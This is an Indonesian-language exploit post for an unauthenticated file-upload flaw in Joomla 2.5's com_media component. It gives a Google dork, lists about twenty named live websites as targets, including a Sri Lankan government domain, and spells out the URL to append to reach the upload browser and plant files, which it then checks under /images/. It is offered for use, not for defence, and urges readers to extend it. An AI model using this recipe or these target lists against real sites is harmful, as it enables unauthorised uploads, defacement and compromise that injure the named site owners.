# Exploit Title: Com_Media (CMS JOOMLA)
# Date: 12-05-2013
# Author: SultanHaikal
# Version: 2.5
# Tested on: Windows Xp & Linux
# My Friend: Hmei7 - Black Angels - Netter - R4kanonymous
# Dork: inurl:com_media dan site:.com inurl:com_media kembangin lagi bro :P jangan mau enaknya aja
Pertama Serach google dork nya :D
Biar ga susah" gua kasih live target nya aja deh :D
www.ayrshirebridge.co.uk
www.magicrete.in
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-world-volunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de
www.ablogic.de
dan masih banyak lagi kang neh langsung aja ke TKP :
http://houseconmin.gov.lk
nah ane pake live target web yang di atas ini coba lu tambahiin ini
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
jadi seperti ini
http://houseconmin.gov.lk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Click Browse
vuln nya file berbentuk : .txt .jpg .gif .png kalo .php dan html kayanya ngga work bro :D tapi misalnnya agan" bisa ya bagus lah di kembangin
jika sudah click browse nah pilih lah file anda :D
lalu click Start upload tunggu sebentar dan selesai.
Jika ingin mengecek file kita tinggal tambahkan /images/filekita
jika sudah click browse nah pilih lah file anda :D
lalu click Start upload tunggu sebentar dan selesai.
Jika ingin mengecek file kita tinggal tambahkan /images/filekita
semoga bermanfaat, terima kasih ^_^